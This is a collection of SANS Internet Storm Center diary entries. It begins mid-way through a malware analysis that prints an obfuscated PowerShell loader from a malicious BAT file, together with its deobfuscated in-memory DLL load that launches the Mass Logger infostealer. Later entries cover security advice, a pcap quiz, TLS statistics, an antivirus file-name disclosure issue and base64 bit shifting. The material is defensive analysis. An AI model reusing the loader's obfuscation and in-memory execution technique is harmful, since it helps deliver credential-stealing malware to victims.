$t0=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}); sal g $t0 [String]$nebj='4D5A9>^>^3>^>^>^04>^>^>^FFFF>^>^B8>^... ... ...>^'.replace('>^','00') function PuKkpsGJ { param($gPPqxvJ) $gPPqxvJ = $gPPqxvJ -split '(..)' | ? { $_ } ForEach ($wbdtbuBT in $gPPqxvJ){ [Convert]::ToInt32($wbdtbuBT,16) } } [String]$CDbvWcpeO='4D5A9>^>^3>^>^>^04>^>^>^FFFF>^>^B8>^... ... ...>^'.replace('>^','00') [Byte[]]$JJAr=PuKkpsGJ $CDbvWcpeO $y='[System.Ap!%%%%#######@@@@@@@****************ain]'.replace('!%%%%#######@@@@@@@****************','pDom')|g; $g55=$y.GetMethod("get_CurrentDomain") $uy='$g55.In!%%%%#######@@@@@@@****************ke($null,$null)'.replace('!%%%%#######@@@@@@@****************','vo')| g $vmc2='$uy.Lo!%%%%#######@@@@@@@****************($JJAr)'.Replace('!%%%%#######@@@@@@@****************','ad') $vmc2| g [Byte[]]$nebj2= PuKkpsGJ $nebj [g8fg0000.gfjhfdgpoerkj]::gihjpdfg('InstallUtil.exe',$nebj2)

After replacing all of the “>^” pairs in the two variables with “00” and saving the resultant value of each variable to a file, the hypothesis was confirmed: the script did contain two PE files, one 42 kB DLL and one 514 kB EXE, both written in one of the .NET family of languages.
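The deobfuscation step is easy to reproduce; a short sketch using the header fragment visible in the script above (the full hex strings are elided in the sample, so only the beginning is checked here):

```python
# Expand the '>^' placeholder back to '00' and verify the result starts with
# the 'MZ' magic of a Windows PE file. The fragment is taken verbatim from
# the script above.
fragment = '4D5A9>^>^3>^>^>^04>^>^>^FFFF>^>^B8>^'
data = bytes.fromhex(fragment.replace('>^', '00'))
print(data[:2])  # b'MZ'
```

The restored bytes (4D 5A 90 00 03 00 ...) are the standard DOS header of a PE executable.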

After a little more deobfuscation of the script in A12.jpg, it became obvious that it basically amounted to the following two lines of code, in which the purpose of the two files can be clearly seen: the script was supposed to load the DLL into memory and then use it to ensure execution of the main malicious executable.

[System.AppDomain].GetMethod("get_CurrentDomain").Invoke($null,$null).Load([DLL file])| IEX
[g8fg0000.gfjhfdgpoerkj]::gihjpdfg('InstallUtil.exe',[EXE file])

Indeed, you may see the relevant part of the DLL in the following image.

After a quick analysis, the EXE file itself turned out to be a sample of the Mass Logger infostealer.

Although I didn’t find any exceptionally large or small malicious files in the batch of quarantined e-mails from 2020, the small BAT file discussed above turned out to be quite interesting in its own way, as the following chart summarizes.

Let us see what 2021 brings us in terms of malware - perhaps next year, we will have a chance to take a look at something exceptionally small or unusually large again...

Indicators of Compromise (IoCs)

A megállapodás feltételei_doc04361120200812113759-ACF.28668_DPJ2020012681851.PDF.bat (1.68 kB)
MD5 - 71bdecdea1d86dd3e892ca52c534fa13
SHA1 - 72071a7e760c348c53be53b6d6a073f9d70fbc4b

A12.jpg (3.25 MB)
MD5 - 60b86e4eac1d3eeab9980137017d3f65
SHA1 - d41b417a925fb7c4a903dd91104ed96dc6e1982b

ManagmentClass.dll (42 kB)
MD5 - 8a738f0e16c427c9de68f370b2363230
SHA1 - 0ac18d2838ce41fe0bdc2ffca98106cadfa0e9b5

service-nankasa.com-LoggerBin.exe (514 kB)
MD5 - 4b99184764b326b10640a6760111403d
SHA1 - 2a61222d0bd7106611003dd5079fcef2a9012a70

[1] https://isc.sans.edu/forums/diary/Picks+of+2019+malware+the+large+the+small+and+the+one+full+of+null+bytes/25718
[2] https://app.any.run/tasks/801cb6a1-6c66-4b98-8b38-14b3e56d660a/
[3] https://isc.sans.edu/forums/diary/Definition+of+overkill+using+130+MB+executable+to+hide+24+kB+malware/26464/
[4] https://app.any.run/tasks/32b4519f-3c10-40f5-a65a-7db9c3a57fd0/

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
January 4, 2021

ISC Stormcast For Monday, January 4th 2021 https://isc.sans.edu/podcastdetail.html?id=7312, (Mon, Jan 4th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
January 3, 2021

Protecting Home Office and Enterprise in 2021, (Sat, Jan 2nd)

Because of COVID, 2020 saw a major shift from working at the "office" to working at home, which in turn shifted attacks to the user at home. Everything indicates that 2020 was a year of ransomware and COVID-19-themed campaigns. Without exception, phishing emails have been the most prolific initial attack vector targeting organizations and home users. This will likely get worse and more disruptive in the coming year.

Past 14 Days - My IP Threat Intel Activity

Every year there are predictions on what we should expect in the coming year and what to watch for. Instead, let's ask: what can be done to secure the enterprise?

  • Implement multi-factor authentication
  • Extend security to the remote workforce
  • Review cloud security policies
  • Improve protection for IoT devices
  • Ensure backups are secure and cannot be reached by attackers seeking to find and delete them
  • Equally important: regularly test backups to ensure the data can be recovered
  • Use and share threat intel to track suspicious activity [1][2]
  • Improve network analytics and log collection [3][4][5]
  • Monitor host and network activity [3][4][5]
  • Improve detection of and protection against phishing email attacks [10]
  • Review the security awareness program and test employees against it [11]
  • Apply system security updates as soon as practical
  • Keep antivirus software current

Over the past year, one of the most difficult tasks has been detecting and preventing compromise via unmanaged devices. With a large portion of employees working from a home office, some forced to use their personal devices, a compromised device has the potential to be used to exploit other systems on the home network as well as on the connected enterprise network (i.e. via VPN access to the employer's network). This challenge will continue for the foreseeable future.

Share your predictions for 2021: what is going to keep you up at night?

[1] https://www.anomali.com/resources/staxx
[2] https://otx.alienvault.com
[3] https://www.elastic.co
[4] http://rocknsm.io
[5] https://securityonionsolutions.com
[6] https://us-cert.cisa.gov
[7] https://cyber.gc.ca
[8] https://www.ncsc.gov.uk
[9] https://www.enisa.europa.eu/topics/csirts-in-europe
[10] https://cyber.gc.ca/en/assemblyline
[11] https://www.sans.org/security-awareness-training?msc=main-nav

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
January 1, 2021

Strings 2021, (Fri, Jan 1st)

This year, for my diary entries with malware analysis, I will check each time whether the malware sample can be analyzed with the strings command (or a variant). And if it can, I'll write up a second analysis using the strings command.

Although most malware samples don't contain clear text strings, I regularly encounter samples that do.

I hope this will make malware analysis more accessible to a larger audience.

Best wishes for the new year to you and your family from all of us at the SANS Internet Storm Center!

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
January 1, 2021

End of Year Traffic Analysis Quiz, (Thu, Dec 31st)

Introduction

I wanted to leave you all with one final traffic analysis quiz for Windows-based malware infection traffic. You can find the pcaps here. Today's exercise has 6 pcaps of different Windows-based malware infections. Your task for this quiz? Determine what type of malware caused the infection in each pcap. I didn't provide any alerts like I've done for previous quizzes. Today's quiz is just a casserole of pcap files, cooked up and served piping hot!


Shown above: A food-based visual for this end-of-year traffic analysis quiz.

A PDF document of answers is also included on the page I linked to earlier. The answers contain associated IOCs for the infections, which can be extracted from the pcaps. But don't peek! First, see how much you can determine by examining the pcaps.

Requirements

This type of analysis requires Wireshark. Wireshark is my tool of choice for reviewing pcaps of infection activity. However, Wireshark's default settings are not optimized for web-based malware traffic. That's why I encourage people to customize Wireshark after installing it. To help, I've written a series of tutorials. The ones most helpful for this quiz are:

Furthermore, I recommend using a non-Windows environment like BSD, Linux, or macOS to analyze malicious traffic. Some of these pcaps contain HTTP traffic delivering Windows-based malware. If you're using a Windows host to review the pcaps, your antivirus (or Windows Defender) may delete the pcap or the malware. Worst case scenario? If you extract the malware from the pcaps and accidentally run the files, you might infect your Windows computer.
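As a small aside, before opening a suspicious capture in Wireshark, it can be handy to verify that a file really is a classic pcap by reading its 24-byte global header. The following is a hedged, stdlib-only Python sketch; the demo writes a synthetic header rather than using any of the quiz files:

```python
import os
import struct
import tempfile

def pcap_link_type(path):
    """Return the link-layer type from a classic pcap global header, or None."""
    with open(path, "rb") as f:
        header = f.read(24)
    if len(header) != 24:
        return None
    if header[:4] == b"\xd4\xc3\xb2\xa1":
        order = "<"              # capture written on a little-endian machine
    elif header[:4] == b"\xa1\xb2\xc3\xd4":
        order = ">"              # big-endian
    else:
        return None              # not a classic pcap (pcapng, perhaps)
    # magic, version major, version minor, tz offset, ts accuracy, snaplen, link type
    return struct.unpack(order + "IHHiIII", header)[6]

# Demo with a synthetic little-endian header (link type 1 = Ethernet).
fd, path = tempfile.mkstemp(suffix=".pcap")
os.write(fd, struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1))
os.close(fd)
print(pcap_link_type(path))  # 1
os.remove(path)
```

A quiz pcap that returns 1 (Ethernet) here will open normally in Wireshark; anything else warrants a closer look before analysis.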

So beware, because there's actual malware involved in parts of this quiz.

Final words

Hope everyone has a happy and healthy year as we enter 2021.

Again, the pcaps and answers for this end-of-year traffic analysis quiz can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
December 30, 2020

TLS 1.3 is now supported by about 1 in every 5 HTTPS servers, (Wed, Dec 30th)

TLS 1.3 has been with us for a couple of years now[1]. It has brought significant security improvements over previous TLS versions (as well as a couple of slightly controversial ideas, such as 0-RTT), and although its adoption is far from universal as of now, the number of servers that support it seems to be slowly increasing.

As you may see from the following chart, which is based on data I’ve gathered over the past three months from Shodan.io, TLS 1.3 was supported by over 20 percent of all HTTPS servers on the internet during the last quarter of 2020. And although the number has recently fallen slightly, the overall rising trend is clearly visible (see the trendline).

The increase in support for TLS 1.3 isn’t the only good news worth mentioning when it comes to the overall security of HTTPS traffic on the internet during the last quarter of 2020, because support for SSL 2.0 has been steadily dropping. At the beginning of October, the number of HTTPS servers supporting this outdated protocol fell below one million, and currently only about 1.5 percent of all HTTPS servers on the internet still support its use.

The fact that there are still servers out there which support SSL 2.0 is of course far from ideal (last year, there were even a few internet banking portals that still supported it[2]), but the numbers show that the situation is indeed getting better.

I’ll add that, since some of our readers have reached out to me with requests for either the data I’ve gathered from Shodan or the script I’ve used to get it, I’ve decided to open-source the tool and will publish it in January 2021. So if you’d like to gather your own data from Shodan about open ports, vulnerabilities or TLS support in your country or around the world, stay tuned…
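In the meantime, for checking a single server rather than gathering Shodan-scale statistics, a handshake probe can be sketched with just the Python standard library (this is not the author's tool, and the demo target below is an arbitrary unreachable local port, so the call simply returns False):

```python
import socket
import ssl

def supports_tls13(host, port=443, timeout=5):
    """Return True if the server completes a handshake when only TLS 1.3 is offered."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_3   # refuse anything older
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE                # probing support, not identity
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return tls.version() == "TLSv1.3"
    except (ssl.SSLError, OSError):
        return False

print(supports_tls13("127.0.0.1", port=9, timeout=1))
```

Pointed at a real HTTPS server, the probe either completes a TLS 1.3 handshake or fails, which is essentially the per-host question behind the aggregate percentages above.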

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
December 30, 2020

ISC Stormcast For Wednesday, December 30th 2020 https://isc.sans.edu/podcastdetail.html?id=7310, (Wed, Dec 30th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
December 29, 2020

Want to know what's in a folder you don't have permission to access? Try asking your AV solution..., (Tue, Dec 29th)

Back in February, I wrote a diary about a small vulnerability in Windows which allows users to brute-force the names of files in folders they don’t have permission to open or list[1]. While thinking about the topic, it occurred to me that a somewhat complete list of the files in a folder one can’t access due to lack of permissions might also be obtained by scanning the folder with an anti-malware solution that displays the names of files currently being scanned.
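The underlying idea can be illustrated conceptually in Python: a per-name probe may fail differently for names that exist than for names that don't, even when the contents are off-limits. This is a simplified, cross-platform sketch, not the exact Windows behavior from the original diary:

```python
import os

def name_probably_exists(path):
    """Conceptual probe: distinguish 'no such name' from 'present but denied'."""
    try:
        os.stat(path)
        return True        # accessible: the name clearly exists
    except PermissionError:
        return True        # access denied, but the error implies the name exists
    except FileNotFoundError:
        return False       # no object with this name
    except OSError:
        return False       # other errors: treat as absent/unknown

print(name_probably_exists(os.devnull))                        # True everywhere
print(name_probably_exists("hopefully_missing_file_98765"))    # False
```

Brute-forcing a dictionary of candidate names against such a probe is, in essence, what the February diary described; the AV trick below is a lazier route to the same information.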

As you may see in the example above, the names of scanned files are indeed displayed by some of the anti-malware solutions out there. And since most anti-malware tools by necessity run with high (i.e. SYSTEM-level) privileges, and it is customary to allow any user to initiate a scan of an arbitrary folder, this can easily lead to unexpected information disclosure (that is, unless the authors of the tool explicitly decided to stop users from scanning folders for which they don’t have access permissions).

Admittedly, the impact of this would be rather low: unless the anti-malware solution logged the name of each scanned file in a way that let a user read the entire log afterwards, it would be limited to disclosure of the names of files the user managed to see or record during the scan itself. Still, it might provide a way for many anti-malware solutions to be abused to bypass confidentiality controls set at the file system level.

Back in February, I decided to do a short test to see how large a portion of AV solutions might actually be abused this way. Since I didn’t intend to do a comprehensive analysis of all the tools out there, I limited the test to 25 anti-malware tools from different vendors mentioned in the Wikipedia article Comparison of antivirus software[2].

The results were quite interesting. Eight of the tools (approximately one third) didn’t scan the contents of any folder that was inaccessible to the user who initiated the scan, while the remaining seventeen did. Of those seventeen, eight displayed the names of the analyzed files during the scan.

One further point to note is that any of the 17 tools that scanned arbitrary folders might have been used in conjunction with Sysinternals Process Monitor[3] to discover the names of all files in any folder (i.e. one would run ProcMon, initiate a scan of the folder, and then list all files in the relevant path that the anti-malware solution read).

Of course, since this would require local administrator permissions on the part of the user, it is hardly a major issue: such a user could simply change the permissions on the target folder to gain access to its contents. Using an anti-malware tool in conjunction with ProcMon would, however, not create the suspicious audit trail that might be left behind if one simply changed the access permissions.

Although the confidentiality impact of the behavior described above is quite low, I contacted all vendors whose tools I determined might be abused in this manner. My assumption was that for the anti-malware tools that let users scan folders they didn’t have access to, this was the result of an intentional design decision on the part of their authors, but I wanted to be sure.

Not every company replied, but for most of those that did, my assumption proved correct: the behavior of their tools was confirmed to be intentional. In only two cases was the behavior deemed to constitute a potential security risk, and those vendors decided to change it in subsequent updates.

Even though this is only a low-impact issue, it is good to know that it exists. After all, if the results of the test are representative of anti-malware solutions at large, low-privileged users might be able to use roughly one in three of them to partially bypass file system permissions that prevent them from listing the contents of folders, and local admins could bypass those permissions completely with the help of anti-malware in two out of three cases.

[1] https://isc.sans.edu/forums/diary/Discovering+contents+of+folders+in+Windows+without+permissions/25816/
[2] https://en.wikipedia.org/wiki/Comparison_of_antivirus_software
[3] https://docs.microsoft.com/en-us/sysinternals/downloads/procmon

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
December 29, 2020

ISC Stormcast For Tuesday, December 29th 2020 https://isc.sans.edu/podcastdetail.html?id=7308, (Tue, Dec 29th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
December 28, 2020

ISC Stormcast For Monday, December 28th 2020 https://isc.sans.edu/podcastdetail.html?id=7306, (Mon, Dec 28th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
December 27, 2020

Quickie: Bit Shifting With translate.py, (Sun, Dec 27th)

As promised in diary entry "Corrupt BASE64 Strings: Detection and Decoding", I explain here how to shift bits with my translate.py tool:

Here is a BASE64 string (SGVsbG8sIHdvcmxkLg==) that decodes to "Hello, world.":

Corrupting this BASE64 string by removing the first character (S) means that it is no longer detected:

And truncating the length to a multiple of 4 (with Python function L4) means that it gets detected, but not decoded properly:

We then proceeded in diary entry "Corrupt BASE64 Strings: Detection and Decoding" to manipulate the input BASE64 string so that we arrived at a decoded string we could recognize.

Here, instead of manipulating the input BASE64 string, I'm manipulating the output by shifting bits.

Each character in a BASE64 string represents 6 bits. So I will bit-shift the output by 2, 4 and 6 bits to the right using my translate.py tool like this (the command shifts the complete byte sequence, not individual bytes):

The result is that a right shift of 6 bits produces a decoded BASE64 string that we can recognize.

With this we know that we are likely missing one BASE64 character at the beginning, and thus we can try fixing it as explained in the previous diary entry.
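For readers without translate.py at hand, the same manipulation can be reproduced in a few lines of Python (a sketch of the idea, not the tool itself):

```python
import base64

# 'SGVsbG8sIHdvcmxkLg==' with the leading 'S' removed and the length
# truncated to a multiple of 4, as in the diary entry above.
corrupt = "GVsbG8sIHdvcmxkL"
data = base64.b64decode(corrupt)

def shift_right(data: bytes, bits: int) -> bytes:
    # Shift the complete byte sequence to the right, not each byte individually.
    return (int.from_bytes(data, "big") >> bits).to_bytes(len(data), "big")

for bits in (2, 4, 6):
    print(bits, shift_right(data, bits))
# The 6-bit shift yields b'\x00ello, world': recognizable, and a hint that
# exactly one 6-bit BASE64 character is missing at the start.
```

Since every BASE64 character carries 6 bits, a readable result at a 6-bit shift points to one missing character, a result at 2 or 4 bits to a partially corrupted one.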


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.